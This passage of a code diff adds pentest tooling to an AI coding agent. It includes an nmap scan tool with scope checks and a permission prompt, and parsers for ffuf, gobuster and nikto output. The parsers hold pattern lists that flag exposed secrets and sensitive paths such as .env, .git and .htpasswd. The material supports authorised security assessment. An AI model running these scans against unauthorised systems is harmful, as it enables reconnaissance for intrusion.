+- Port range: target="192.168.1.1", ports="1-1000"
+- Service detection: target="192.168.1.1", serviceDetection=true
+- Specific ports: target="192.168.1.1", ports="22,80,443,8080"
+- Network range: target="192.168.1.0/24"
+
+The tool automatically:
+1. Validates the target against governance scope
+2. Runs nmap with appropriate flags
+3. Parses XML output for structured results
+4. Generates security findings for interesting services
+5. Returns human-readable summary with detailed port information`,
+
+    parameters: z.object({
+      target: z
+        .string()
+        .describe("Target IP address, hostname, or CIDR range to scan. Subject to governance scope restrictions."),
+      ports: z
+        .string()
+        .optional()
+        .describe("Port specification (e.g., '22,80,443' or '1-1000' or 'T:1-1000,U:53'). Defaults to top 1000 ports."),
+      serviceDetection: z
+        .boolean()
+        .optional()
+        .default(true)
+        .describe("Enable service/version detection (-sV). Default: true"),
+      timing: z
+        .number()
+        .min(0)
+        .max(5)
+        .optional()
+        .default(3)
+        .describe("Nmap timing template (0-5, higher is faster but noisier). Default: 3"),
+      udpScan: z
+        .boolean()
+        .optional()
+        .default(false)
+        .describe("Include UDP scan (-sU). Note: UDP scans are slower. Default: false"),
+      osDetection: z
+        .boolean()
+        .optional()
+        .default(false)
+        .describe("Enable OS detection (-O). Requires root/admin. Default: false"),
+      scriptScan: z
+        .boolean()
+        .optional()
+        .default(false)
+        .describe("Run default NSE scripts (-sC). Default: false"),
+      timeout: z
+        .number()
+        .optional()
+        .describe("Scan timeout in milliseconds. Default: 300000 (5 minutes)"),
+      analyzeFindings: z
+        .boolean()
+        .optional()
+        .default(true)
+        .describe("Automatically create findings from scan results. Default: true"),
+    }),
+
+    async execute(params, ctx) {
+      const scanID = generateScanId()
+      const startTime = Date.now()
+
+      // Build nmap command
+      const args: string[] = []
+
+      // Output format (XML to stdout)
+      args.push("-oX", "-")
+
+      // Timing template
+      args.push(`-T${params.timing}`)
+
+      // Port specification
+      if (params.ports) {
+        args.push("-p", params.ports)
+      }
+
+      // Service detection
+      if (params.serviceDetection) {
+        args.push("-sV")
+      }
+
+      // OS detection
+      if (params.osDetection) {
+        args.push("-O")
+      }
+
+      // Script scan
+      if (params.scriptScan) {
+        args.push("-sC")
+      }
+
+      // UDP scan
+      if (params.udpScan) {
+        args.push("-sU")
+      }
+
+      // Target
+      args.push(params.target)
+
+      const command = `nmap ${args.join(" ")}`
+
+      // Classify target for governance
+      const target = GovernanceMatcher.classifyTarget(params.target)
+
+      // Request permission
+      await ctx.ask({
+        permission: "bash",
+        patterns: [command],
+        always: ["nmap *"],
+        metadata: {
+          tool: "nmap",
+          target: params.target,
+          targetType: target.type,
+        },
+      })
+
+      log.info("Starting nmap scan", {
+        scanID,
+        target: params.target,
+        command,
+      })
+
+      // Publish scan started event
+      try {
+        Bus.publish(PentestTypes.Event.ScanStarted, {
+          scanID,
+          target: params.target,
+          command,
+        })
+      } catch {
+        // Ignore bus errors if no instance context
+      }
+
+      // Initialize metadata
+      ctx.metadata({
+        title: `Scanning ${params.target}`,
+        metadata: {
+          scanID,
+          target: params.target,
+          status: "running",
+        },
+      })
+
+      const timeout = params.timeout ?? DEFAULT_TIMEOUT
+
+      // Execute nmap
+      const proc = spawn("nmap", args, {
+        cwd: Instance.directory,
+        stdio: ["ignore", "pipe", "pipe"],
+      })
+
+      let stdout = ""
+      let stderr = ""
+
+      proc.stdout?.on("data", (chunk: Buffer) => {
+        stdout += chunk.toString()
+      })
+
+      proc.stderr?.on("data", (chunk: Buffer) => {
+        stderr += chunk.toString()
+      })
+
+      let timedOut = false
+      let aborted = false
+
+      // Handle abort
+      const abortHandler = () => {
+        aborted = true
+        proc.kill("SIGTERM")
+      }
+      ctx.abort.addEventListener("abort", abortHandler, { once: true })
+
+      // Timeout handler
+      const timeoutTimer = setTimeout(() => {
+        timedOut = true
+        proc.kill("SIGTERM")
+      }, timeout)
+
+      // Wait for completion
+      await new Promise<void>((resolve, reject) => {
+        proc.once("exit", () => {
+          clearTimeout(timeoutTimer)
+          ctx.abort.removeEventListener("abort", abortHandler)
+          resolve()
+        })
+        proc.once("error", (err) => {
+          clearTimeout(timeoutTimer)
+          ctx.abort.removeEventListener("abort", abortHandler)
+          reject(err)
+        })
+      })
+
+      const endTime = Date.now()
+
+      // Check for errors
+      if (proc.exitCode !== 0 && !timedOut && !aborted) {
+        const errorMsg = stderr || "Unknown error"
+        log.error("Nmap scan failed", { scanID, exitCode: proc.exitCode, error: errorMsg })
+
+        return {
+          title: `Scan failed: ${params.target}`,
+          output: `Nmap scan failed with exit code ${proc.exitCode}:\n${errorMsg}`,
+          metadata: {
+            scanID,
+            target: params.target,
+            status: "failed",
+          },
+        }
+      }
+
+      // Parse XML output
+      const result = NmapParser.parse(stdout, scanID, ctx.sessionID, params.target, command)
+      result.endTime = endTime
+
+      // Save scan result
+      await Findings.saveScan(result, { storage: "file" })
+
+      // Generate findings if enabled
+      let findings: PentestTypes.Finding[] = []
+      if (params.analyzeFindings) {
+        findings = await Findings.analyzeAndCreateFindings(result, { storage: "file" })
+      }
+
+      // Format output
+      const formattedOutput = NmapParser.formatResult(result)
+      const summary = NmapParser.summarize(result)
+
+      // Build output with findings
+      let output = formattedOutput
+
+      if (findings.length > 0) {
+        output += "\n\n" + "=".repeat(50) + "\n"
+        output += "SECURITY FINDINGS\n"
+        output += "=".repeat(50) + "\n\n"
+
+        for (const finding of findings) {
+          output += `[${finding.severity.toUpperCase()}] ${finding.title}\n`
+          output += `  Target: ${finding.target}:${finding.port}\n`
+          output += `  Description: ${finding.description}\n`
+          if (finding.remediation) {
+            output += `  Remediation: ${finding.remediation}\n`
+          }
+          output += "\n"
+        }
+      }
+
+      // Add status notes
+      if (timedOut) {
+        output += `\n[NOTE] Scan terminated after ${timeout / 1000}s timeout`
+      }
+      if (aborted) {
+        output += "\n[NOTE] Scan was aborted by user"
+      }
+
+      log.info("Nmap scan completed", {
+        scanID,
+        target: params.target,
+        hostsFound: result.hosts.length,
+        findingsCreated: findings.length,
+        duration: endTime - startTime,
+      })
+
+      const status = timedOut ? "timeout" : aborted ? "aborted" : "completed"
+      return {
+        title: summary,
+        output,
+        metadata: {
+          scanID,
+          target: params.target,
+          status,
+        },
+      }
+    },
+  }
+})
diff --git a/packages/opencode/src/pentest/parsers/ffuf.ts b/packages/opencode/src/pentest/parsers/ffuf.ts
new file mode 100644
index 00000000000..0a2a68abe3e
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/ffuf.ts
@@ -0,0 +1,307 @@
+/**
+ * @fileoverview FFuf Output Parser
+ *
+ * Parses ffuf web fuzzer JSON output.
+ * Use -of json flag when running ffuf.
+ *
+ * @module pentest/parsers/ffuf
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.parser.ffuf" })
+
+/**
+ * Single ffuf result entry.
+ */
+export const FfufEntry = z.object({
+  input: z.record(z.string(), z.string()).optional(),
+  position: z.number().optional(),
+  status: z.number(),
+  length: z.number(),
+  words: z.number(),
+  lines: z.number(),
+  contentType: z.string().optional(),
+  redirectlocation: z.string().optional(),
+  resultFile: z.string().optional(),
+  url: z.string(),
+  host: z.string().optional(),
+  duration: z.number().optional(),
+})
+export type FfufEntry = z.infer<typeof FfufEntry>
+
+/**
+ * FFuf scan result structure.
+ */
+export const FfufResult = z.object({
+  target: z.string(),
+  commandLine: z.string().optional(),
+  results: z.array(FfufEntry),
+  config: z.object({
+    url: z.string(),
+    wordlist: z.string().optional(),
+    method: z.string().optional(),
+    headers: z.record(z.string(), z.string()).optional(),
+    filters: z.object({
+      status: z.array(z.number()).optional(),
+      size: z.array(z.number()).optional(),
+      words: z.array(z.number()).optional(),
+      lines: z.array(z.number()).optional(),
+    }).optional(),
+  }).optional(),
+  startTime: z.number().optional(),
+  endTime: z.number().optional(),
+})
+export type FfufResult = z.infer<typeof FfufResult>
+
+export namespace FfufParser {
+  /**
+   * Parse ffuf JSON output into structured result.
+   *
+   * @param output - Raw ffuf output (JSON format)
+   * @param target - Target URL
+   * @returns Parsed ffuf result
+   */
+  export function parse(output: string, target: string): FfufResult {
+    try {
+      const json = JSON.parse(output)
+      return parseJson(json, target)
+    } catch {
+      // Fall back to text parsing for non-JSON output
+      return parseText(output, target)
+    }
+  }
+
+  /**
+   * Parse ffuf JSON format.
+   */
+  function parseJson(json: any, target: string): FfufResult {
+    const results: FfufEntry[] = []
+
+    // ffuf JSON has results array
+    const rawResults = json.results || []
+    for (const result of rawResults) {
+      results.push({
+        input: result.input,
+        position: result.position,
+        status: result.status,
+        length: result.length || result.content_length || 0,
+        words: result.words || result.content_words || 0,
+        lines: result.lines || result.content_lines || 0,
+        contentType: result["content-type"] || result.contentType,
+        redirectlocation: result.redirectlocation,
+        resultFile: result.resultfile,
+        url: result.url,
+        host: result.host,
+        duration: result.duration,
+      })
+    }
+
+    // Parse timing
+    let startTime: number | undefined
+    let endTime: number | undefined
+    if (json.time) {
+      startTime = new Date(json.time).getTime()
+    }
+    if (json.time && json.duration) {
+      endTime = startTime! + json.duration
+    }
+
+    return {
+      target,
+      commandLine: json.commandline,
+      results,
+      config: json.config ? {
+        url: json.config.url || target,
+        wordlist: json.config.inputproviders?.[0]?.value,
+        method: json.config.method,
+        headers: json.config.headers,
+      } : undefined,
+      startTime,
+      endTime,
+    }
+  }
+
+  /**
+   * Parse ffuf text output (non-JSON).
+   */
+  function parseText(output: string, target: string): FfufResult {
+    const results: FfufEntry[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Parse standard ffuf text output format
+      // Format: url                     [Status: 200, Size: 1234, Words: 100, Lines: 50]
+      const match = line.match(/^(\S+)\s+\[Status:\s*(\d+),\s*Size:\s*(\d+),\s*Words:\s*(\d+),\s*Lines:\s*(\d+)\]/)
+      if (match) {
+        results.push({
+          url: match[1],
+          status: parseInt(match[2], 10),
+          length: parseInt(match[3], 10),
+          words: parseInt(match[4], 10),
+          lines: parseInt(match[5], 10),
+        })
+      }
+    }
+
+    return {
+      target,
+      results,
+    }
+  }
+
+  /**
+   * Format ffuf result as human-readable text.
+   */
+  export function format(result: FfufResult): string {
+    const lines: string[] = []
+
+    lines.push(`FFuf Fuzzing Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    if (result.config?.wordlist) {
+      lines.push(`Wordlist: ${result.config.wordlist}`)
+    }
+    if (result.config?.method) {
+      lines.push(`Method: ${result.config.method}`)
+    }
+    lines.push(`Results: ${result.results.length}`)
+    lines.push("")
+
+    if (result.results.length === 0) {
+      lines.push("No results found.")
+      return lines.join("\n")
+    }
+
+    // Group by status code
+    const byStatus = new Map<number, FfufEntry[]>()
+    for (const entry of result.results) {
+      const existing = byStatus.get(entry.status) || []
+      existing.push(entry)
+      byStatus.set(entry.status, existing)
+    }
+
+    // Output grouped results
+    for (const [status, entries] of [...byStatus.entries()].sort((a, b) => a[0] - b[0])) {
+      lines.push(`Status ${status} (${entries.length} results)`)
+      lines.push("-".repeat(40))
+
+      for (const entry of entries.slice(0, 30)) {
+        const redirect = entry.redirectlocation ? ` -> ${entry.redirectlocation}` : ""
+        lines.push(`  ${entry.url} [${entry.length} bytes, ${entry.words} words]${redirect}`)
+      }
+
+      if (entries.length > 30) {
+        lines.push(`  ... and ${entries.length - 30} more`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize ffuf results.
+   */
+  export function summarize(result: FfufResult): string {
+    const statusCounts = new Map<number, number>()
+    for (const entry of result.results) {
+      statusCounts.set(entry.status, (statusCounts.get(entry.status) || 0) + 1)
+    }
+
+    const parts = [`FFuf found ${result.results.length} result(s)`]
+    const interesting = result.results.filter(r => r.status !== 404 && r.status !== 400)
+    if (interesting.length !== result.results.length) {
+      parts.push(`${interesting.length} interesting`)
+    }
+
+    return parts.join(", ")
+  }
+
+  /**
+   * Convert ffuf results to pentest findings.
+   * Focuses on interesting discoveries.
+   */
+  export function toFindings(
+    result: FfufResult,
+    sessionID: string,
+    scanID: string
+  ): Array<Omit<PentestTypes.Finding, "id" | "createdAt">> {
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    // Sensitive patterns
+    const sensitivePatterns = [
+      /admin/i, /backup/i, /config/i, /\.git/i, /\.env/i, /\.sql/i,
+      /\.bak/i, /api/i, /swagger/i, /graphql/i, /debug/i,
+    ]
+
+    // Only create findings for significant results
+    for (const entry of result.results) {
+      // Skip client errors except 403
+      if (entry.status >= 400 && entry.status !== 403) continue
+
+      // Check for sensitive paths
+      const isSensitive = sensitivePatterns.some(p => p.test(entry.url))
+
+      // Only flag sensitive paths or forbidden access
+      if (!isSensitive && entry.status !== 403) continue
+
+      let severity: PentestTypes.Severity = "info"
+      let title = `Path discovered: ${extractPath(entry.url)}`
+
+      if (entry.url.match(/\.(bak|sql|env|config)$/i)) {
+        severity = "high"
+        title = `Sensitive file found: ${extractPath(entry.url)}`
+      } else if (entry.url.match(/\.git/i)) {
+        severity = "critical"
+        title = `Git repository exposed`
+      } else if (entry.url.match(/admin/i)) {
+        severity = "medium"
+        title = `Admin endpoint found: ${extractPath(entry.url)}`
+      }
+
+      findings.push({
+        sessionID,
+        scanID,
+        title,
+        description: `FFuf discovered ${entry.url}`,
+        severity,
+        status: "open",
+        target: extractHost(entry.url || result.target),
+        port: extractPort(entry.url || result.target),
+        protocol: "tcp",
+        service: "http",
+        evidence: `URL: ${entry.url}\nStatus: ${entry.status}\nSize: ${entry.length} bytes\nWords: ${entry.words}`,
+      })
+    }
+
+    return findings
+  }
+
+  function extractPath(url: string): string {
+    try {
+      return new URL(url).pathname
+    } catch {
+      return url.split("?")[0]
+    }
+  }
+
+  function extractHost(url: string): string {
+    try {
+      return new URL(url).hostname
+    } catch {
+      return url.replace(/^https?:\/\//, "").split(/[:/]/)[0]
+    }
+  }
+
+  function extractPort(url: string): number {
+    try {
+      const u = new URL(url)
+      if (u.port) return parseInt(u.port, 10)
+      return u.protocol === "https:" ? 443 : 80
+    } catch {
+      return 80
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/parsers/gobuster.ts b/packages/opencode/src/pentest/parsers/gobuster.ts
new file mode 100644
index 00000000000..042d9933b24
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/gobuster.ts
@@ -0,0 +1,318 @@
+/**
+ * @fileoverview Gobuster Output Parser
+ *
+ * Parses gobuster directory/DNS/VHost brute force scanner output.
+ * Supports JSON (-o json) and text output formats.
+ *
+ * @module pentest/parsers/gobuster
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.parser.gobuster" })
+
+/**
+ * Single gobuster discovery result.
+ */
+export const GobusterEntry = z.object({
+  status: z.number(),
+  path: z.string(),
+  size: z.number().optional(),
+  redirect: z.string().optional(),
+  contentType: z.string().optional(),
+  words: z.number().optional(),
+  lines: z.number().optional(),
+})
+export type GobusterEntry = z.infer<typeof GobusterEntry>
+
+/**
+ * Gobuster scan result structure.
+ */
+export const GobusterResult = z.object({
+  target: z.string(),
+  mode: z.enum(["dir", "dns", "vhost", "fuzz", "s3", "gcs", "tftp"]),
+  entries: z.array(GobusterEntry),
+  wordlist: z.string().optional(),
+  startTime: z.number().optional(),
+  endTime: z.number().optional(),
+})
+export type GobusterResult = z.infer<typeof GobusterResult>
+
+export namespace GobusterParser {
+  /**
+   * Parse gobuster output into structured result.
+   *
+   * @param output - Raw gobuster output (JSON or text)
+   * @param target - Target URL
+   * @param mode - Gobuster mode (dir, dns, vhost, etc.)
+   * @returns Parsed gobuster result
+   */
+  export function parse(output: string, target: string, mode: GobusterResult["mode"] = "dir"): GobusterResult {
+    // Try JSON parsing first
+    try {
+      const json = JSON.parse(output)
+      if (Array.isArray(json)) {
+        return {
+          target,
+          mode,
+          entries: json.map(normalizeJsonEntry).filter((e): e is GobusterEntry => e !== null),
+        }
+      }
+    } catch {
+      // Fall back to text parsing
+    }
+
+    return parseText(output, target, mode)
+  }
+
+  /**
+   * Normalize a JSON entry to GobusterEntry format.
+   */
+  function normalizeJsonEntry(json: any): GobusterEntry | null {
+    if (!json.path && !json.url && !json.subdomain) return null
+
+    return {
+      status: json.status || json["status-code"] || 200,
+      path: json.path || json.url || json.subdomain || "",
+      size: json.size || json.length,
+      redirect: json.redirect || json.location,
+      contentType: json["content-type"] || json.contentType,
+      words: json.words,
+      lines: json.lines,
+    }
+  }
+
+  /**
+   * Parse gobuster text output.
+   */
+  function parseText(output: string, target: string, mode: GobusterResult["mode"]): GobusterResult {
+    const entries: GobusterEntry[] = []
+    const lines = output.split("\n")
+
+    let wordlist: string | undefined
+
+    for (const line of lines) {
+      // Extract wordlist from header
+      const wordlistMatch = line.match(/Wordlist:\s+(\S+)/)
+      if (wordlistMatch) {
+        wordlist = wordlistMatch[1]
+        continue
+      }
+
+      // Parse result lines
+      // Format: /path (Status: 200) [Size: 1234]
+      const dirMatch = line.match(/^(\S+)\s+$Status:\s*(\d+)$(?:\s+\[Size:\s*(\d+)\])?/)
+      if (dirMatch) {
+        entries.push({
+          path: dirMatch[1],
+          status: parseInt(dirMatch[2], 10),
+          size: dirMatch[3] ? parseInt(dirMatch[3], 10) : undefined,
+        })
+        continue
+      }
+
+      // Alternative format: /path                 (Status: 200)
+      const altMatch = line.match(/^(\S+)\s+$Status:\s*(\d+)$/)
+      if (altMatch) {
+        entries.push({
+          path: altMatch[1],
+          status: parseInt(altMatch[2], 10),
+        })
+        continue
+      }
+
+      // DNS mode format: Found: subdomain.example.com
+      const dnsMatch = line.match(/^Found:\s+(\S+)/)
+      if (dnsMatch) {
+        entries.push({
+          path: dnsMatch[1],
+          status: 200,
+        })
+        continue
+      }
+
+      // Simple format without status (just paths)
+      if (line.startsWith("/") && !line.includes(" ")) {
+        entries.push({
+          path: line.trim(),
+          status: 200,
+        })
+      }
+    }
+
+    return {
+      target,
+      mode,
+      entries,
+      wordlist,
+    }
+  }
+
+  /**
+   * Format gobuster result as human-readable text.
+   */
+  export function format(result: GobusterResult): string {
+    const lines: string[] = []
+
+    lines.push(`Gobuster ${result.mode.toUpperCase()} Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    if (result.wordlist) {
+      lines.push(`Wordlist: ${result.wordlist}`)
+    }
+    lines.push(`Found: ${result.entries.length} results`)
+    lines.push("")
+
+    if (result.entries.length === 0) {
+      lines.push("No results found.")
+      return lines.join("\n")
+    }
+
+    // Group by status code
+    const byStatus = new Map<number, GobusterEntry[]>()
+    for (const entry of result.entries) {
+      const existing = byStatus.get(entry.status) || []
+      existing.push(entry)
+      byStatus.set(entry.status, existing)
+    }
+
+    // Sort status codes
+    const statusCodes = [...byStatus.keys()].sort()
+
+    for (const status of statusCodes) {
+      const entries = byStatus.get(status)!
+      const statusLabel = getStatusLabel(status)
+
+      lines.push(`${statusLabel} (${status}) - ${entries.length} found`)
+      lines.push("-".repeat(40))
+
+      for (const entry of entries.slice(0, 50)) { // Limit output
+        const sizeStr = entry.size ? ` [${entry.size} bytes]` : ""
+        const redirectStr = entry.redirect ? ` -> ${entry.redirect}` : ""
+        lines.push(`  ${entry.path}${sizeStr}${redirectStr}`)
+      }
+
+      if (entries.length > 50) {
+        lines.push(`  ... and ${entries.length - 50} more`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get human-readable status label.
+   */
+  function getStatusLabel(status: number): string {
+    if (status >= 200 && status < 300) return "OK"
+    if (status >= 300 && status < 400) return "Redirect"
+    if (status === 401) return "Unauthorized"
+    if (status === 403) return "Forbidden"
+    if (status === 404) return "Not Found"
+    if (status >= 400 && status < 500) return "Client Error"
+    if (status >= 500) return "Server Error"
+    return "Unknown"
+  }
+
+  /**
+   * Summarize gobuster results.
+   */
+  export function summarize(result: GobusterResult): string {
+    const successCount = result.entries.filter(e => e.status >= 200 && e.status < 400).length
+    const forbiddenCount = result.entries.filter(e => e.status === 403).length
+
+    let summary = `Gobuster found ${result.entries.length} path(s)`
+    if (successCount > 0) summary += `, ${successCount} accessible`
+    if (forbiddenCount > 0) summary += `, ${forbiddenCount} forbidden`
+
+    return summary
+  }
+
+  /**
+   * Convert gobuster results to pentest findings.
+   * Only generates findings for interesting discoveries.
+   */
+  export function toFindings(
+    result: GobusterResult,
+    sessionID: string,
+    scanID: string
+  ): Array<Omit<PentestTypes.Finding, "id" | "createdAt">> {
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    // Interesting paths to flag
+    const sensitivePatterns = [
+      /admin/i, /backup/i, /config/i, /\.git/i, /\.env/i, /\.sql/i,
+      /\.bak/i, /\.old/i, /\.swp/i, /\.log/i, /password/i, /secret/i,
+      /api\/v\d/i, /swagger/i, /graphql/i, /phpinfo/i, /phpmyadmin/i,
+      /wp-admin/i, /wp-config/i, /\.htaccess/i, /\.htpasswd/i,
+      /debug/i, /test/i, /dev/i, /staging/i,
+    ]
+
+    for (const entry of result.entries) {
+      // Skip 404s and common false positives
+      if (entry.status === 404) continue
+
+      // Check if path matches sensitive patterns
+      const isSensitive = sensitivePatterns.some(p => p.test(entry.path))
+
+      // Only create findings for:
+      // 1. Sensitive paths that are accessible (200) or forbidden (403)
+      // 2. Admin panels
+      // 3. Backup files
+      if (!isSensitive && entry.status !== 403) continue
+
+      let severity: PentestTypes.Severity = "info"
+      let title = `Directory found: ${entry.path}`
+
+      if (entry.path.match(/\.(bak|old|sql|env|swp|log)$/i)) {
+        severity = "high"
+        title = `Sensitive file exposed: ${entry.path}`
+      } else if (entry.path.match(/\.git/i)) {
+        severity = "critical"
+        title = `Git repository exposed: ${entry.path}`
+      } else if (entry.path.match(/admin|phpmyadmin|wp-admin/i)) {
+        severity = entry.status === 200 ? "medium" : "low"
+        title = `Admin panel found: ${entry.path}`
+      } else if (entry.status === 403) {
+        severity = "info"
+        title = `Forbidden directory: ${entry.path}`
+      }
+
+      findings.push({
+        sessionID,
+        scanID,
+        title,
+        description: `Gobuster discovered ${entry.path} (HTTP ${entry.status})`,
+        severity,
+        status: "open",
+        target: extractHost(result.target),
+        port: extractPort(result.target),
+        protocol: "tcp",
+        service: "http",
+        evidence: `Path: ${entry.path}\nStatus: ${entry.status}${entry.size ? `\nSize: ${entry.size} bytes` : ""}`,
+      })
+    }
+
+    return findings
+  }
+
+  function extractHost(url: string): string {
+    try {
+      return new URL(url).hostname
+    } catch {
+      return url.replace(/^https?:\/\//, "").split(/[:/]/)[0]
+    }
+  }
+
+  function extractPort(url: string): number {
+    try {
+      const u = new URL(url)
+      if (u.port) return parseInt(u.port, 10)
+      return u.protocol === "https:" ? 443 : 80
+    } catch {
+      return 80
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/parsers/index.ts b/packages/opencode/src/pentest/parsers/index.ts
new file mode 100644
index 00000000000..fed9a2c7c95
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/index.ts
@@ -0,0 +1,48 @@
+/**
+ * @fileoverview Security Tool Parsers
+ *
+ * Provides structured output parsing for common security tools.
+ * Each parser extracts data into standardized formats for analysis.
+ *
+ * @module pentest/parsers
+ */
+
+export { NiktoParser } from "./nikto"
+export { NucleiParser } from "./nuclei"
+export { GobusterParser } from "./gobuster"
+export { FfufParser } from "./ffuf"
+export { SslscanParser } from "./sslscan"
+
+import { NiktoParser } from "./nikto"
+import { NucleiParser } from "./nuclei"
+import { GobusterParser } from "./gobuster"
+import { FfufParser } from "./ffuf"
+import { SslscanParser } from "./sslscan"
+
+/**
+ * Parser registry for automatic tool output parsing.
+ */
+export const Parsers = {
+  nikto: NiktoParser,
+  nuclei: NucleiParser,
+  gobuster: GobusterParser,
+  ffuf: FfufParser,
+  sslscan: SslscanParser,
+  sslyze: SslscanParser, // Similar output format
+} as const
+
+export type ParserName = keyof typeof Parsers
+
+/**
+ * Check if a parser exists for a given tool.
+ */
+export function hasParser(tool: string): tool is ParserName {
+  return tool in Parsers
+}
+
+/**
+ * Get parser for a tool.
+ */
+export function getParser(tool: ParserName) {
+  return Parsers[tool]
+}
diff --git a/packages/opencode/src/pentest/parsers/nikto.ts b/packages/opencode/src/pentest/parsers/nikto.ts
new file mode 100644
index 00000000000..09c59645c34
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/nikto.ts
@@ -0,0 +1,300 @@
+/**
+ * @fileoverview Nikto Output Parser
+ *
+ * Parses nikto web vulnerability scanner output.
+ * Supports both JSON (-o file -Format json) and text output formats.
+ *
+ * @module pentest/parsers/nikto
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.parser.nikto" })
+
+/**
+ * Nikto finding from scan output.
+ */
+export const NiktoFinding = z.object({
+  id: z.string().optional(),
+  OSVDB: z.string().optional(),
+  method: z.string().optional(),
+  url: z.string(),
+  msg: z.string(),
+  references: z.array(z.string()).optional(),
+})
+export type NiktoFinding = z.infer<typeof NiktoFinding>
+
+/**
+ * Nikto scan result structure.
+ */
+export const NiktoResult = z.object({
+  target: z.string(),
+  host: z.string(),
+  ip: z.string().optional(),
+  port: z.number(),
+  banner: z.string().optional(),
+  startTime: z.number().optional(),
+  endTime: z.number().optional(),
+  findings: z.array(NiktoFinding),
+  statistics: z.object({
+    itemsFound: z.number(),
+    itemsTested: z.number(),
+    duration: z.number().optional(),
+  }).optional(),
+})
+export type NiktoResult = z.infer<typeof NiktoResult>
+
+export namespace NiktoParser {
+  /**
+   * Parse nikto output into structured result.
+   *
+   * @param output - Raw nikto output (JSON or text)
+   * @param target - Target URL
+   * @returns Parsed nikto result
+   */
+  export function parse(output: string, target: string): NiktoResult {
+    // Try JSON parsing first
+    try {
+      const json = JSON.parse(output)
+      return parseJson(json, target)
+    } catch {
+      // Fall back to text parsing
+      return parseText(output, target)
+    }
+  }
+
+  /**
+   * Parse nikto JSON output.
+   */
+  function parseJson(json: any, target: string): NiktoResult {
+    const host = json.host || target
+    const findings: NiktoFinding[] = []
+
+    // Handle different nikto JSON structures
+    const vulns = json.vulnerabilities || json.items || []
+    for (const vuln of vulns) {
+      findings.push({
+        id: vuln.id?.toString(),
+        OSVDB: vuln.OSVDB?.toString() || vuln.osvdb?.toString(),
+        method: vuln.method || "GET",
+        url: vuln.url || vuln.uri || "/",
+        msg: vuln.msg || vuln.message || vuln.description || "",
+        references: vuln.references,
+      })
+    }
+
+    return {
+      target,
+      host: json.host || extractHost(target),
+      ip: json.ip,
+      port: json.port || extractPort(target),
+      banner: json.banner,
+      startTime: json.startTime ? new Date(json.startTime).getTime() : undefined,
+      endTime: json.endTime ? new Date(json.endTime).getTime() : undefined,
+      findings,
+      statistics: json.statistics,
+    }
+  }
+
+  /**
+   * Parse nikto text output.
+   */
+  function parseText(output: string, target: string): NiktoResult {
+    const findings: NiktoFinding[] = []
+    const lines = output.split("\n")
+
+    let host = extractHost(target)
+    let port = extractPort(target)
+    let ip: string | undefined
+    let banner: string | undefined
+
+    for (const line of lines) {
+      // Extract target info
+      const targetMatch = line.match(/\+ Target IP:\s+(\S+)/)
+      if (targetMatch) {
+        ip = targetMatch[1]
+        continue
+      }
+
+      const hostMatch = line.match(/\+ Target Hostname:\s+(\S+)/)
+      if (hostMatch) {
+        host = hostMatch[1]
+        continue
+      }
+
+      const portMatch = line.match(/\+ Target Port:\s+(\d+)/)
+      if (portMatch) {
+        port = parseInt(portMatch[1], 10)
+        continue
+      }
+
+      const serverMatch = line.match(/\+ Server:\s+(.+)/)
+      if (serverMatch) {
+        banner = serverMatch[1].trim()
+        continue
+      }
+
+      // Parse findings (lines starting with + that contain vulnerabilities)
+      if (line.startsWith("+ ") && !line.includes("Target") && !line.includes("Server:") && !line.includes("Start Time")) {
+        const finding = parseTextFinding(line)
+        if (finding) {
+          findings.push(finding)
+        }
+      }
+    }
+
+    return {
+      target,
+      host,
+      ip,
+      port,
+      banner,
+      findings,
+    }
+  }
+
+  /**
+   * Parse a single finding line from text output.
+   */
+  function parseTextFinding(line: string): NiktoFinding | null {
+    // Remove leading "+ "
+    const content = line.slice(2).trim()
+    if (!content) return null
+
+    // Extract OSVDB if present
+    const osvdbMatch = content.match(/OSVDB-(\d+):?\s*/)
+    const OSVDB = osvdbMatch ? osvdbMatch[1] : undefined
+
+    // Extract URL if present
+    const urlMatch = content.match(/(\/.+?):\s+/) || content.match(/(\/.+?)\s+-\s+/)
+    const url = urlMatch ? urlMatch[1] : "/"
+
+    // The rest is the message
+    let msg = content
+    if (osvdbMatch) {
+      msg = msg.replace(osvdbMatch[0], "").trim()
+    }
+    if (urlMatch) {
+      msg = msg.replace(urlMatch[0], "").trim()
+    }
+
+    return {
+      OSVDB,
+      url,
+      msg: msg || content,
+      method: "GET",
+    }
+  }
+
+  /**
+   * Extract hostname from URL.
+   */
+  function extractHost(url: string): string {
+    try {
+      return new URL(url).hostname
+    } catch {
+      return url.replace(/^https?:\/\//, "").split(/[:/]/)[0]
+    }
+  }
+
+  /**
+   * Extract port from URL.
+   */
+  function extractPort(url: string): number {
+    try {
+      const u = new URL(url)
+      if (u.port) return parseInt(u.port, 10)
+      return u.protocol === "https:" ? 443 : 80
+    } catch {
+      return 80
+    }
+  }
+
+  /**
+   * Format nikto result as human-readable text.
+   */
+  export function format(result: NiktoResult): string {
+    const lines: string[] = []
+
+    lines.push(`Nikto Scan Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    lines.push(`Host: ${result.host}${result.ip ? ` (${result.ip})` : ""}`)
+    lines.push(`Port: ${result.port}`)
+    if (result.banner) {
+      lines.push(`Server: ${result.banner}`)
+    }
+    lines.push("")
+
+    if (result.findings.length === 0) {
+      lines.push("No findings detected.")
+    } else {
+      lines.push(`FINDINGS (${result.findings.length})`)
+      lines.push("-".repeat(50))
+
+      for (const finding of result.findings) {
